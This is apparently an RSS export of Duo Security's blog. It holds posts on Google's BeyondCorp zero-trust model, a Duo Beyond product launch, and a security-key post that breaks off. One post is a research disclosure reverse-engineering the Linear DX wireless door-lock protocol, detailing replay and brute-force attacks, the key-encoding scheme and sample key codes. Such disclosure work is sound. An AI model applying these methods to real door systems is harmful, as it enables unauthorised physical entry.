<![CDATA[Duo Security Bulletin]]> https://duo.com/ Duo Security provides two-factor authentication and endpoint security as a service, built to protect against account takeover and data theft. en-us info@duosecurity.com Copyright 2017 <![CDATA[RSAC 2017: BeyondCorp - How Google Protects Its Corporate Security Perimeter Without Firewalls]]> https://duo.com/blog/rsac-2017-beyondcorp-how-google-protects-its-corporate-security-perimeter-without-firewalls Tue, 21 Feb 2017 09:00:00 -0500

The RSA Conference 2017 is filled with an awful lot of noise, but many of the same themes resonated throughout the keynotes, sessions and vendor messaging.

One of those themes is around protecting the new perimeter-less enterprise IT model, using a new approach to security. Google’s Director of Information Security Heather Adkins and Site Reliability Engineering (SRE) Manager Rory Ward gave a talk about how Google solved this problem internally.

Moving to a Mobile, Distributed Workforce

Your enterprise is your castle - with the sensitive data inside, and a strong perimeter on the outside. Decades ago, you would typically connect hardware and software in your environment and enable firewalls to protect it all.

But as our workforces become more mobile, the inhabitants of the castle (your employees) started working outside of the castle. They needed a way to work remotely, and a way to work collaboratively with other people outside of the firewall.

Nowadays, many use the Swiss-cheese approach: building walls inside of the castle and using network segmentation, which can be difficult to maintain. Google’s network was similar, but their challenges soon grew more and more complex as they struggled to support employees working from all over the world.

They used a virtual private network (VPN) to extend the castle perimeter to the most popular mobile device of choice - the laptop. While users know VPNs, they don’t particularly like them - they’re unreliable, disconnect frequently, tend to break, and are heavyweight.

Google’s employees wanted to use their new tablets, laptops and phones. These devices are mobile and escape the network perimeter. Supporting these devices securely has become a business differentiator, allowing users to be more innovative, productive and seamlessly do work from all over the world.

What if Walls Never Worked?

This led Google to ask: What if walls never worked? What if firewalls never worked?

Google BeyondCorp - Walls Don't Work

Imagine a cosmopolitan city and busy road, where your employees are mingling with other people on the street. You can’t tell if they’re authorized or unauthorized by only their location on the street. The same goes for your users, based on the network they’re coming from.

These are Google’s BeyondCorp Principles:

  1. Connecting from a particular network must not determine which services you can access
  2. Access to services is granted based on what we know about you and your device
  3. All access to services must be authenticated, authorized and encrypted

These principles help Google’s security team achieve its goal of having every employee work successfully from untrusted networks, without the use of a VPN.

Implementing BeyondCorp

Rory explained how Google implemented BeyondCorp internally and externalized their single sign-on (SSO) and access proxy. The system is now globally deployed and fully redundant, and took about two to three years to implement.

They relied on two major aspects:

  1. First, they got to know their users with a detailed user inventory that tracked users throughout their lifecycle and job function changes, and ensured that the information is updated as they move through the organization.
  2. Second, they got to know their devices with a device inventory that tracked devices from procurement to provisioning to end of life. They also track what happens when a device gets repaired or upgraded.

They also built a trust repository for their devices using device certificates that ingests data from about 20 different data sources about what the device is doing on the network.

Google’s security team also keeps a policy file that defines how to define trust for certain devices (i.e., if a device has been on the network for at least 20 days, or they may automatically mark mobile phones as low-trust). The trust of a particular device can also go up or down depending on what it has done, or what the policy says.

Google BeyondCorp - Access Control Engine

Rory referred to their ‘access control engine’ as a combination of an indication of who the user is, what the device is, and the resource it’s trying to get access to. For example, to access source code systems, you must be a full-time Google employee working in Engineering, using a fully-trusted desktop computer.
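The access control engine’s logic can be sketched as a simple rule evaluation. The following Python sketch is purely illustrative - the attribute names and structure are assumptions, not Google’s actual engine - but it captures the source-code example above:

```python
# Hypothetical sketch of a BeyondCorp-style access decision.
# Attribute names and the example rule are illustrative, not Google's engine.

def can_access_source_code(user, device):
    """Example rule from the talk: source code requires a full-time
    employee in Engineering on a fully-trusted desktop."""
    return (
        user.get("employment") == "full-time"
        and user.get("org") == "engineering"
        and device.get("type") == "desktop"
        and device.get("trust") == "full"
    )

engineer = {"employment": "full-time", "org": "engineering"}
trusted_desktop = {"type": "desktop", "trust": "full"}
low_trust_phone = {"type": "phone", "trust": "low"}

print(can_access_source_code(engineer, trusted_desktop))  # True
print(can_access_source_code(engineer, low_trust_phone))  # False
```

The key point is that the decision combines user, device and resource on every request, rather than trusting the network a request arrives from.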

Migrating BeyondCorp

They deployed an unprivileged network in all 200 Google buildings and compared existing traffic against what the new, no-privilege network would allow. By sniffing their own traffic and examining all user SAML traffic in the company via the network routers on the old network, they figured out what traffic would work on the new network, and what wouldn’t.

They installed an agent on every device and looked at every packet from that device, replaying it on the unprivileged network. They also built a migration pipeline, using big data to figure out what traffic would be on the new network. They moved tens of thousands of devices onto the new network.

BeyondCorp Outreach - White Papers

Google has released three white papers to help educate the industry on what they’re doing, why, and how:

Check out each of the abstracts, as well as links to download the full papers in PDF format, in the Research at Google Publications library.

BeyondCorp Deployment: Lessons Learned

They learned that they needed to get and retain executive support, especially since, in some cases, they would have to ask users to change how they operate on a day-to-day basis.

The clear wins included making IT simpler and more secure, as well as much happier users that were able to work from anywhere in the world. They also learned that data quality is key, and that they needed to make the migration painless for users.

Communication with their users was key to let them know what was happening, in addition to getting feedback from users on how they’re experiencing the migration to alleviate any distrust.

Additionally, they needed to run highly reliable systems, which is where site reliability engineering comes in. If the access policy doesn’t work, no one gets access.

Applying BeyondCorp

Others can learn from Google’s example to apply BeyondCorp principles in their own organizations’ environments:

  1. Have zero trust in your network
  2. Base access decisions on what you know about the user and device
  3. Migrate carefully so as not to break existing users

Duo’s newest edition launched earlier this month is the first commercial implementation of Google’s BeyondCorp model. Duo Beyond allows you to identify corporate vs. personal devices with easy certificate deployment, block untrusted endpoints, and give your users secure access to internal applications without using VPNs.

All in addition to Duo’s easy-to-use two-factor authentication, secure single sign-on (SSO) and phishing vulnerability assessments.

]]>
<![CDATA[Flipping Bits and Opening Doors: Reverse Engineering the Linear Wireless Security DX Protocol]]> https://duo.com/blog/flipping-bits-and-opening-doors-reverse-engineering-the-linear-wireless-security-dx-protocol Mon, 20 Feb 2017 09:51:00 -0500

Like most companies these days, Duo employs a keycard-based access control system in our office. During my last trip to the office, I noticed that reception has a wireless remote to trigger the magnetic lock. This immediately piqued the interest of the Duo Labs team, so we decided to do some poking and see what we could do with such a system.

Here we explore the implementation of a legacy, but still actively marketed, wireless physical security system as well as how it undermines more advanced security controls. Several vulnerabilities were identified:

  • The protocol itself is inherently vulnerable to replay attacks.
  • The key space was half of what the manufacturer advertises, allowing an attacker to brute-force entry in an average of about 7 hours.
  • A quality assurance misstep allowed for some units to be brute-forced within 30 minutes.

Wireless Security System

Introduction

To get things started, we scribbled down the FCC ID off the back of the beige remote and dusted off a HackRF.

Wireless Security System FCC ID

The remote was identified as a Linear DXT-21 talking to a DXR-701 receiver operating at 315.0MHz. Looking over the documentation, a particular statement stood out:

The digital DX code format features over a million possible codes. The DX transmitters are precoded at the factory to unique codes, so no field coding is required. The multi-button transmitters send variations of their preset codes depending on which buttons are pressed.

The system had over a million possible codes! This might have been quite the claim in 1995 when the system was first introduced, but in the era of the $100 Software Defined Radio (SDR), it gave cause for concern.

First, we tried one of the most trivial of attacks: replay. Product documentation stated that these transmitters have a range of up to 700 feet. By recording from a distance what the transmitter sends and replaying it back from a SDR, an attacker might be able to trigger the receiver if the coding format was repetitive or fixed. The results spoke for themselves:

With the smell of blood in the water, we ordered a separate DXR-701 receiver and a bunch of DXT-21 remotes off of Amazon and rigged up a simple indicator light for when the internal relay strikes.

Indicator Light DXR-701

Getting the SDR out again, we began characterizing the signal. Pulling up the waterfall in GQRX and tuning to 315MHz while tapping the transmit button, we could see very narrow bursts of data in the frequency domain. This indicated some form of amplitude modulation.

Amplitude Modulation

Hopping over to the time domain in GNURadio, we could clearly see data encoded with some derivative of On-Off Keying (OOK): 17 relatively uniform peaks in a repeating pattern with a period of about 100ms.

GNURadio

DXT-21 Internals

With the general signaling understood, we decided to first peek under the covers of the remotes and see what other information we could gain.

Inside DXT-21 Remote

Inside we found a single-sided through-hole PCB with a very simple two-transistor transmitter with a single DIP18 microcontroller and a couple buttons. Peeling back the sticker on the controller revealed an 8-bit PIC microcontroller (PIC16C54A-04/P) with a manufacturing date code from 2015.

PIC Microcontroller

As the PIC16C series is EPROM-based, it can only be programmed once. I sucked the chips out of three of the boards and threw them into an old EPROM writer to see if I could dump the 512-byte firmware image stored onboard.

EPROM

The firmware code-protection bit turned out to be set; instead of real contents, reads returned words XORed with preceding bytes. Comparing the dumps of these three chips showed that the only difference between them was within the first three bytes:

Firmware Dump

I eventually put a socket on one of the PCBs so I could easily swap between the firmwares without juggling the eventual mess of a wire harness.

PCB Socket

DXR-701 Internals

With as much information extracted from the remotes as possible, I turned my aim to the receiver. Inside the DXR-701, I found a similar style of through-hole board construction with a few unpopulated components for the 2-channel variant. In the middle of the board sat a PIC16C56-XT/P microcontroller, identical to the one in the remote but with twice as much EPROM. Sucking out the PIC chip yielded similar scrambled results as that of the remotes.

DXR-701 Back

The back of the remotes had no components to speak of, but the back of the receiver held a lone Adesto 45DB041D-SU SOIC8 528K SPI flash chip positioned close to the microcontroller.

Circuit Flash Chip

One of my favorite tools for dealing with SPI buses is the BeagleBone Black. You can quite easily get the SPI bus exposed as a device node opening a range of options from direct scripting with pyspidev to using well-developed tools like flashrom. I wired up a SOIC8 chip clip to the BeagleBone and attached it to the flash chip in circuit.

Chip Clip

Having already paired a single remote (out of a possible 32) into the receiver for testing, dumping the chip yielded some interesting results. Three distinct areas stood out: a single 0xFE at location 0x100, a single high-entropy 264-byte page, and another 0xFE at some arbitrary location.

Chip Dump 1

The receiver documentation made clear that the user should be careful not to program the same remote twice so I did just that and programmed a second instance. Dumping the flash after that showed the byte at 0x100 had decremented by 1, but all other data remained the same:

Dump 2

I thought it strange for so much data to be stored for a single key, given that a key occupies no more than three bytes in the transmitter’s firmware, so I performed the forget-all-codes operation and dumped the receiver again to see what a non-programmed state looks like. That dump yielded a completely empty flash:

Dump 3

Reprogramming the same remote and dumping the flash again showed something unexpected. The high entropy page was completely gone! Only two addresses contained data.

Dump 4

I programmed two additional remotes into the receiver and dumped the flash to confirm my suspicions.

Dump 6

The high-entropy page had accidentally been left in the flash from the factory - probably a test pattern that wasn’t cleared. Predictably, with each additional key paired, the value at 0x100 would decrement by 1 and a byte correlating to the key would be placed in the address space.
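Assuming the erased flash state is all 0xFF bytes (consistent with the completely empty dump above), the number of paired keys can be read straight off the counter at 0x100. A small illustrative sketch:

```python
# The counter byte at flash offset 0x100 starts at 0xFF (erased) and is
# decremented once per paired key: 0xFE means one key, 0xFD means two, etc.
# Treating 0xFF as the erased state is an assumption based on the dumps.
ERASED = 0xFF

def paired_key_count(counter_byte):
    return ERASED - counter_byte

print(paired_key_count(0xFE))  # 1
print(paired_key_count(0xFD))  # 2
```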

Signal Analysis

Based on these tests, it seemed odd that the receiver would have a 32-code memory limit when a key occupies only a single byte across the expansive 528K flash. I changed the key count to 0xFE and flashed my custom image. All three programmed keys still actuated the relay. The limit was completely arbitrary and unenforced outside of the programming mode.

This gave me a few potential avenues of attack and a series of questions. Could I identify the coding of the key to target specific flash addresses? Could that be pointed at the address of the key count? How fast could I iterate over the entire flash?

Probing around the transmitter, I discovered two pins, connecting to R9 and R7, that when driven high would activate the transmitter, performing the OOK.

Activate Transmitter

Saleae Logic

With the ability to analyze the keying digitally, I set the HackRF aside and connected my 8 channel Saleae Logic clone. I took some captures of the various remotes that I had and put them on top of each other with an SDR-sourced waveform to compare against. Much of the coding became clear:

Waveform

All 17 pulses were of uniform 0.5ms width spread across a fixed 85ms window. There was a common series of three pulses that appeared to be a preamble, a series of five pulses for the postamble, and a series of nine pulses that varied in spacing for different keys with no symbol being closer than 0.8ms.

Doing some napkin math on how many ways there are to scatter nine 0.8ms symbols across a 47ms timespan yielded a number close to 100 million. This immediately felt off, as the sales sheet brags about having over 1 million possible codes, and marketing departments are rarely apt to under-advertise a product’s capabilities.

On a hunch, I logged and sorted all the inter-pulse delays that I had seen. It turned out that there were only 7 distinct values, spaced just 1.24ms apart!

Inter-Pulse Delay

By plotting these values, it was clear that I had examples of all possible symbols:

Symbol Scatter

With this knowledge in hand, I could transform the captured waveforms into numeric symbol streams consisting of a two-symbol prefix, a ten-symbol key and a five-symbol postfix, with the irrelevant last digit serving as retransmission dead space and an end marker for the preceding digit.

Symbol Streams
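The timing measurements suggest a straightforward decoder: quantize each inter-pulse delay into one of the seven bins spaced 1.24ms apart. This is my own sketch, and treating the 0.8ms minimum gap as symbol 0 is an assumption, not something stated by the manufacturer:

```python
# Sketch of decoding inter-pulse delays (in ms) into symbol values 0-6.
# MIN_GAP and SPACING come from the measurements above; mapping the
# shortest observed gap to symbol 0 is an assumption.
MIN_GAP = 0.8    # ms, shortest inter-pulse delay observed
SPACING = 1.24   # ms between adjacent symbol values

def delays_to_symbols(delays_ms):
    # Round to the nearest bin to tolerate a little timing jitter.
    return [round((d - MIN_GAP) / SPACING) for d in delays_ms]

# A synthetic stream: symbols 0, 3 and 6 with slight jitter.
print(delays_to_symbols([0.81, 4.50, 8.20]))  # [0, 3, 6]
```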

To enumerate the entire possible key space, I could have done some complicated math, but computers are fast -- so I took the brute-force approach and wrote a small utility to do it for me. This generated a list of all theoretically possible keys: 16,733,080 in total. That value was still larger than the advertised one million, but it was a start.

Test Harness

To try to correlate key values to SPI flash addresses, I would need samples. Lots of samples. Much more than the three remotes I had on hand. I needed some automation. Ideally, I wanted a setup where I could stimulate the receiver with a symbol sequence of my choosing and watch what traffic, if any, occurred between the PIC16 controller and the SPI flash chip.

To make a universal transmitter which could transmit any symbol sequence, I hijacked a remote’s RF stage as I had previously burned out my HackRF’s TX frontend.

Universal Transmitter

By bending the two signal pins out of their DIP socket, I could manually key the transmitter freely for up to 10 seconds before the PIC shut down. I knew I’d want to transmit for longer periods than that, so I wired in permanent power and attached a lead to the PIC’s reset line that I could pull low between transmissions.

Keying the Transmitter

To drive all of this, I would need a reliable signal generator. I was already using a BeagleBone Black to dump the SPI flash, so I decided to leverage one of its two internal Programmable Realtime Units (PRUs). These RISC PRUs have a relatively fast 200MHz clock and allow for single-cycle I/O access.

After a bit of futzing around with the instruction set, I had some PRU code and a utility that would take my symbol sequence and output the appropriate waveform all from the command line.

To correlate key values to flash addresses, I wired in my logic analyzer to the receiver and used a little-known feature of sigrok’s CLI utility to perform the live SPI protocol decoding. From that stream of SPI data, I could see what flash addresses were being accessed.

Wired Logic Analyzer

The SPI flash itself used 264-byte DataFlash pages. Data was accessed by specifying a 3-byte locator consisting of an 11-bit page address and a 9-bit byte offset.
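That locator scheme can be sketched in a few lines. The helper functions here are mine, not the device’s, but the packed example matches the 0f,98,00 address that shows up in the traces (page 0x7CC, byte 0):

```python
# Sketch of Adesto DataFlash addressing with 264-byte pages:
# a 3-byte locator packs an 11-bit page number and a 9-bit byte offset.
def pack_locator(page, byte_offset):
    assert 0 <= page < (1 << 11) and 0 <= byte_offset < 264
    value = (page << 9) | byte_offset
    return value.to_bytes(3, "big")

def unpack_locator(raw):
    value = int.from_bytes(raw, "big")
    return value >> 9, value & 0x1FF

# Page 0x7CC, byte 0 packs to the 0f 98 00 locator.
print(pack_locator(0x7CC, 0).hex())  # 0f9800
```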

10-Symbol Key Fuzzing

After confirming that all the keys I had on hand were included in the output of my code generator, I grabbed a block of codes starting from a known key and passed them through the test harness.

To my delight, I started seeing responses. Not only was the test harness working, but as I iterated through the code generator’s output, the byte address being accessed by the controller would increment by one. After leaving the automation running for several thousand iterations, it became clear that the last four symbols of the key were encoded into a byte offset with a consistent encoding. I had a list of all 256 possible values, and they were consistent across different pages. However, the flash used 264-byte pages; the 8 bytes beyond offset 255 appeared to be unaddressable.

Next, I held the last four symbols static and repeated the test, fuzzing the lower six symbols, which acted as page selectors. The page selectors likewise incremented by one! By mixing and matching the lists, I could address arbitrary bytes from pages 0x401 to 0x7FF.

Key Address

Curiously, pages 0x000 to 0x400 were inaccessible. Even though all six of my remotes used the same two-symbol (63) prefix, there had to be another page bit hiding in what I had assumed was a static two-symbol prefix.

11-Symbol Key Fuzzing

By expanding the code generator to produce all possible 11-symbol codes, I could apply the same fuzzing strategy - holding the byte offset fixed - and identify the lower pages, as they were encoded into the lower seven symbols. This yielded a list of 4,001 valid page addresses. Going back to our napkin math: 4,001 pages * 256 offsets = 1,024,256! Just as advertised!

However, astute readers will remember that the SPI flash is only half that size. Looking more closely at the code mappings revealed that most page addresses had two valid values.

In other words, there are two keys that resolve to the same address. For instance, both 33306033334 and 15306033334 map to flash address 0f,98,00 and trigger the relay. This cut the key space almost in half, to only 2,047 page selectors, meaning there are only 524,032 truly unique remotes.

Postfix Fuzzing (Channel Selector)

The only curiosity that remained was the four-symbol postfix and what actually got written to the flash upon pairing a remote with a receiver. After fuzzing and identifying 8 traffic-generating postfixes, it turned out these four symbols select which bit gets cleared in the flash. All six of my DXT-21 remote keys ended in ‘2353’, which resulted in a bitmask of 0xFE being applied. I suspected this is how the multi-channel remotes are implemented.

To confirm, I sourced a DXT-42 three-“code” remote. Through SPI traffic monitoring, it became clear that the code is consistent regardless of which button is pressed, the only difference being which mask is applied: Channel 1 applied a mask of 0xFE just like the DXT-21s do, Channel 2 used 0x7F, and Channel 3 used 0xFD.

Channel
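Under this bit-clearing model, channel pairing takes only a few lines to model. The helper functions below are illustrative (the channel-to-mask mapping is from the observations above, and the all-ones erased byte is an assumption consistent with the empty flash dumps):

```python
# Channel masks observed via SPI monitoring: pairing a channel ANDs its
# mask into the key's flash byte, clearing one bit per channel.
CHANNEL_MASKS = {1: 0xFE, 2: 0x7F, 3: 0xFD}

def pair_channel(flash_byte, channel):
    return flash_byte & CHANNEL_MASKS[channel]

def channel_paired(flash_byte, channel):
    cleared_bit = 0xFF ^ CHANNEL_MASKS[channel]
    return (flash_byte & cleared_bit) == 0

byte = 0xFF                   # erased: no channels paired
byte = pair_channel(byte, 1)  # clears bit 0 -> 0xFE
byte = pair_channel(byte, 3)  # clears bit 1 -> 0xFC
print(hex(byte), channel_paired(byte, 2))  # 0xfc False
```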

Exploitation

Now we had the full key-encoding definition:

Key-Encoding Definition

With this and knowledge of how to iterate over the entire key space, we can draw some conclusions about the complexity of brute-forcing these devices. Each code takes approximately 100ms to transmit and be ingested by the receiver. With only 524,032 unique keys, any given remote channel can be brute-forced in its totality in about 14.5 hours, or just 7.25 hours on average - well within the realm of practical feasibility.

My receiver came out of the factory with a dirty page full of high-entropy data. The only “illegal” value for any given key is 0xFF. If this manufacturing oversight is a common occurrence, then by trying 16 key combinations across each of the 2,047 pages, an attacker could trigger the relay in under half an hour on average. Worse yet, there is no way to tell whether a unit is affected short of dumping the flash chip manually. Force-clearing the memory of the receivers and re-pairing the remotes is a must.
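The figures above follow from simple arithmetic, assuming roughly 100ms per attempted code:

```python
# Back-of-the-napkin brute-force timing, assuming ~100ms per code.
CODE_TIME_S = 0.1
PAGES, OFFSETS = 2047, 256

unique_keys = PAGES * OFFSETS
print(unique_keys)                                 # 524032
print(round(unique_keys * CODE_TIME_S / 3600, 1))  # ~14.6 h worst case
print(round(unique_keys * CODE_TIME_S / 7200, 1))  # ~7.3 h on average

# Dirty-page shortcut: 16 candidate codes across each of the 2047 pages.
dirty_codes = 16 * PAGES
print(round(dirty_codes * CODE_TIME_S / 60, 1))    # ~54.6 min worst case
```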

When combined with the inherent vulnerability to replay attacks, the Linear DX system might be good enough to turn some Christmas lights off and on, but I wouldn’t trust it for its intended use of physical access control.

Code used for this project may be found on my github, here.

]]>
<![CDATA[BeyondCorp For The Rest Of Us]]> https://duo.com/blog/beyondcorp-for-the-rest-of-us Wed, 08 Feb 2017 08:35:00 -0500

Rumor has it that the enterprise security perimeter is going to make a guest cameo on The Walking Dead. People have certainly been proclaiming the perimeter’s demise for years now: the Jericho Forum was created to tackle “de-perimeterisation” as early as 2003.

The idea really picked up steam as the cloud became more accepted as a common place to store and process data. Now that Google has come out and described in detail how they’ve made it happen, and dubbed it “BeyondCorp,” it’s within practical reach for many more organizations, with a concrete example to consider implementing.

The idea of getting rid of the perimeter is generally too scary for enterprises to contemplate, especially if they’ve only recently solidified one. So let’s not think of it as getting rid of the perimeter, but rather as tightening security on the inside so that the perimeter isn’t the only thing keeping the attacker at bay.

Here at Duo, we believe in the democratization of security. It’s all very well to talk about restructuring your IT when you have armies of technical talent and revenue that let you buy or build one of everything; but what about the rest of us? This is why Duo has come out with the first major commercial implementation of BeyondCorp, called Duo Beyond (read more about it here).

What’s BeyondCorp About?

Google’s vision is similar to John Kindervag’s “zero-trust model” of information security: to assume that no traffic within an enterprise’s network is any more trustworthy by default than traffic coming in from the outside. Of course, enterprises can’t operate without any kind of trust; the trick is to set the conditions under which they will decide to trust something.

Google’s implementation rests on the combination of validated users using validated endpoint devices, locked down with least-privilege segregation and end-to-end encryption. As long as the user is authenticated with the right number of factors, and is using an endpoint that has been enrolled and inspected for security vulnerabilities, they can access exactly those resources that they’re allowed to by a centralized proxy.

Duo BeyondCorp Diagram

As Google illustrates above (click to view larger), they rely on a device inventory database, a user/group database, and client-side certificates for strong identification and control. Obviously, this didn’t happen overnight. In order to migrate a huge and complex infrastructure to this model, they had to map and simulate workflows, using transition measures such as split DNS to make sure nothing broke while it was being gradually moved out of the “soft and chewy center.”

What Risks Does This Address?

The biggest one, of course, is that an attacker breaks through the perimeter and then has free rein within the trusted internal network. Google specifically referred to the “Aurora” attacks as an example of what prompted BeyondCorp. The counterpart to this risk is that you don’t have to start by breaking through the perimeter: if you’re an insider planning malfeasance, you’re already there. The traditional way to deal with this risk is to segment the network, but creating segmentation after the fact can be a major project, disrupting traffic and application tiers, and in many organizations, it never gets done. And let’s face it: a sufficiently successful outsider looks exactly like an insider.

Another risk is that the attacker exploits the gaps between different policies or enforcement that apply to the same asset. For example, if the same confidential data is available in two different systems using different types of authentication, the attacker will go after the one that’s easier to reach -- either because it trusts something else, or because that one authentication method has a flaw in it. You can prevent arbitrage by trusting nothing by default and making everyone pass the same tests each time.

A common risk that every organization faces is the vulnerable endpoint. At the very least, endpoints should be up to date on the operating system and plugins that they need to use. This isn’t always practical due to legacy software, but users who simply don’t get around to upgrading -- especially on their personal devices -- are a security headache for the enterprise.

With a centralized access proxy, you can have one set of policies for each application, regardless of where the system or user is located. A third-party SaaS could have the same trust requirements for access as an internal web application. This is important because attackers try to come from the “most trusted” location, whether that’s a known IP address, an “internal” system, or a favored geographic area. With the BeyondCorp model, it’s the combination of user and endpoint that earns the trust, not the network.

Note: you can have different requirements based on whether it’s an internal or external app, but once you start making that distinction, you’re back on the road to destroying that security model you just tried to implement. Make sure your policies are based on business criticality and confidentiality, not on “inside” versus “outside.”

What Should Organizations Think About?

If you’re already in the hybrid environment -- with some of your infrastructure on-premises and some in the cloud -- it’s time to think about how you could potentially use the BeyondCorp model to re-balance your security policies, because you already have assets that aren’t within your perimeter. For those with a large network who haven’t been able to segment it as much as they’d like, or for tighter control, the BeyondCorp model may offer a chance to focus on combining user and endpoint verification with encryption.

The good news is that you don’t have to do this all at once. While Google’s description of a comprehensive migration sounds daunting, moving to this different concept of security also works when you do it incrementally. Remember, you’re not actually getting rid of the perimeter controls; you’re raising the level of security on the inside so that it looks more like the outside. Any progress is a significant improvement.

Here are some of the high-level steps to plan for:

  1. Enroll your users and their endpoints. This may require a discovery process, since users might not always be using the corporate assets you assigned them. By routing those users to a popular application through an authentication gateway such as the ones that Duo provides, you can get an inventory on the fly.

  2. Deploy certificates to the user endpoints that you want to mark as “managed” or “trusted.” The level of trust is up to you, but for some organizations, it means that they’re officially supported and maintained by the enterprise; for others who embrace BYOD, it means that they’ve done the initial hygiene check during enrollment and validated that the user really is using that device. In the case of Duo Beyond, the certificates and PKI (public key infrastructure) are created as part of the service, but they can also work with an existing PKI.

  3. Create access policies based on the requirements for each application or system you want to protect. These policies can include how often you want users to re-authenticate; whether they can use personal devices; and which level of hygiene you want to enforce. These policies can be adjusted dynamically based on security events. For example, if a new vulnerability is being actively exploited in a particular endpoint OS or plugin, you can block affected users until they update it. This drives users to update on their own rather than waiting for IT to organize a scheduled maintenance window (no more Terror Tuesday!).

  4. Profit! Well, maybe not profit, but benefit from better visibility and a tighter set of controls over what your users and endpoints are accessing, regardless of where they are. By adapting to the new reality -- that applications, users and devices can change locations at the drop of a hat -- you’ll be able to maintain a more consistent level of security and user experience.
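The per-application policies described in step 3 might be expressed as simple rules. The following Python sketch is hypothetical - the field names, applications and thresholds are invented for illustration, and Duo’s actual policy configuration does not look like this:

```python
# Hypothetical per-application access policies illustrating step 3.
# All names and values here are invented for illustration only.
POLICIES = {
    "source-control": {
        "reauth_days": 1,
        "allow_personal_devices": False,
        "min_os": {"macos": "10.12"},   # block known-exploited versions
    },
    "wiki": {
        "reauth_days": 7,
        "allow_personal_devices": True,
        "min_os": {},
    },
}

def device_allowed(app, device):
    policy = POLICIES[app]
    if device["personal"] and not policy["allow_personal_devices"]:
        return False
    required = policy["min_os"].get(device["os"])
    return required is None or device["version"] >= required

byod_phone = {"personal": True, "os": "ios", "version": "10.0"}
print(device_allowed("wiki", byod_phone))            # True
print(device_allowed("source-control", byod_phone))  # False
```

The useful property is that tightening one entry (say, raising a minimum OS version during an active exploit) immediately applies to every user of that application, wherever they are.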

Since BeyondCorp is a concept, not a specific product, you’ll see a growing number of variations on the theme as companies large and small implement it. Look for more blog entries on this topic as Duo supports this movement Beyond the traditional security limits.

]]>
<![CDATA[Announcing Our New Edition, Duo Beyond!]]> https://duo.com/blog/announcing-our-new-edition-duo-beyond Wed, 08 Feb 2017 08:30:00 -0500

Today, we’re excited to announce some major changes to our product line. We are introducing a new edition, Duo Beyond, to help address security challenges as customers increase adoption of cloud applications and BYOD initiatives.

Duo Beyond is modeled after Google’s BeyondCorp security architecture - a radical shift from traditional perimeter-based security models. It assumes a zero-trust environment across the organization, ensuring that no traffic within an enterprise’s network is, by default, any more trustworthy than traffic coming in from the outside. You can read our blog on Google BeyondCorp for more information.

Duo Beyond provides increased security by addressing three main use cases for modern corporate IT environments:

  • Differentiating between corporate and personal devices
  • Limiting sensitive data access to only corporate devices
  • Limiting remote access to specific applications without exposing the network

Let’s examine each of these in greater detail.

Trusted Endpoints and Protecting Sensitive Data

With Duo Beyond, we are introducing our Trusted Endpoints feature, which allows customers to easily distinguish company-owned laptops from personal laptops accessing corporate applications. Traditionally, this was done using a combination of various security technologies, spanning endpoint protection platforms (EPP), network access control (NAC), virtual private networks (VPNs), client certificates, and public key infrastructures (PKIs).

Duo is making this process radically simple; administrators can distribute Duo certificates to their corporate laptops to mark them as ‘Trusted’ without having to deploy their own public key infrastructure or NAC solution. Through our beta testing with over 100 customers, we’ve seen most customers fully deploy certificates within 2 hours. This is a significant reduction compared to traditional NAC deployments, which often take several months to complete.

We also gathered some great insight on BYOD trends. Generally, about one-third of all laptops in a company’s environment tend to be corporate devices, while two-thirds of the devices are personally owned (which companies have no visibility or control over). This further validates the security concerns brought on by BYOD adoption.

In addition to providing visibility into which devices are corporate-managed and which are personally owned, Duo also allows you to control access based on the same attributes. If a laptop has a Duo certificate, it is considered a trusted endpoint. These policies can be created at the global, application, or user level, and they can be applied to any web-based application regardless of whether it’s hosted in the cloud or on-premises.

Throughout our beta program, we saw a common use case where customers enforced a higher level of trust for privileged account access. For example, regular users were able to log into Salesforce.com with any laptop as long as it was up to date and had proper security settings enabled, such as disk encryption, passcode enforcement, etc. (also enforced with Duo’s Trusted Access platform). However, Salesforce administrators’ accounts were only accessible using devices that had a valid Duo certificate.
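That tiered-trust pattern can be sketched in a few lines - a hypothetical illustration with invented attribute names, not Duo's actual policy engine:

```python
# Hypothetical sketch of tiered device trust: regular users need a healthy
# laptop; privileged (admin) accounts additionally need a valid certificate.

def check_login(role, device):
    healthy = device["disk_encrypted"] and device["passcode_set"]
    if not healthy:
        return "deny: device fails hygiene check"
    if role == "admin" and not device["has_valid_cert"]:
        return "deny: admin access requires a certified (trusted) device"
    return "allow"

byod = {"disk_encrypted": True, "passcode_set": True, "has_valid_cert": False}
corp = {"disk_encrypted": True, "passcode_set": True, "has_valid_cert": True}

print(check_login("user", byod))   # allow: BYOD is fine for regular users
print(check_login("admin", byod))  # deny: admins need a trusted device
print(check_login("admin", corp))  # allow
```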

A Better Way to Secure Remote Access

Duo Beyond also provides a simple and secure way for companies to provide remote access to corporate applications without exposing the rest of the network. While VPNs have traditionally solved remote access requirements, there are still some drawbacks:

  • VPN clients are clunky and provide a sub-par user experience. Connections are often slow and unreliable, leading to end user frustrations.
  • It’s difficult to segment network access using a VPN. Once a user logs in, they often have access to the entire network, which presents a security challenge.

Customers can now use Duo’s secure single sign-on to give end users one consistent login experience while accessing any cloud or on-premises application. Best of all, users don’t have to go through a VPN, meaning companies can provide remote access to certain applications without exposing the rest of the network. This not only improves overall security posture, but it also introduces cost savings.

For many companies, the vast majority of remote employees use VPN tunnels for only a few web applications. By moving access to those applications out of the VPN, companies can retire most of their VPN licenses.

Other Notable Changes

To make our product offerings even easier to understand, we are renaming the existing Duo editions to better align with our customers’ requirements. Here is the new Duo product lineup, effective February 8, 2017:

New Duo Editions

Finally, we are integrating Duo Insight, our free phishing simulation tool, into Duo Access. In July 2016, we introduced this tool to help organizations measure their exposure to targeted phishing attacks for free. This is critical to understanding user risk and successfully implementing two-factor authentication to protect against credential theft. Duo Access and Duo Beyond customers can now launch unlimited phishing simulations to measure this risk in their employee base.

We’ve made a number of (positive) new changes to our editions - check out our Customer FAQ to learn how this affects you.

]]>
<![CDATA[Google, Facebook Amp Up Authentication With Security Keys]]> https://duo.com/blog/google-facebook-amp-up-authentication-with-security-keys https://duo.com/blog/google-facebook-amp-up-authentication-with-security-keys Mon, 06 Feb 2017 09:00:00 -0500

Now Facebook and G Suite users can use a security key to authenticate and verify their identities during login, as reported by Threatpost and TechCrunch.

As a secure method of two-factor authentication, security keys are physical hardware tokens that plug into a USB port on your laptop.

After typing in their username and password, the user is prompted to complete the second factor. Tapping the key generates a one-time cryptographic response that grants them access to Facebook or Google’s suite of cloud-based productivity apps (formerly known as Google Apps).

A More Secure Way to Ensure Trusted Users

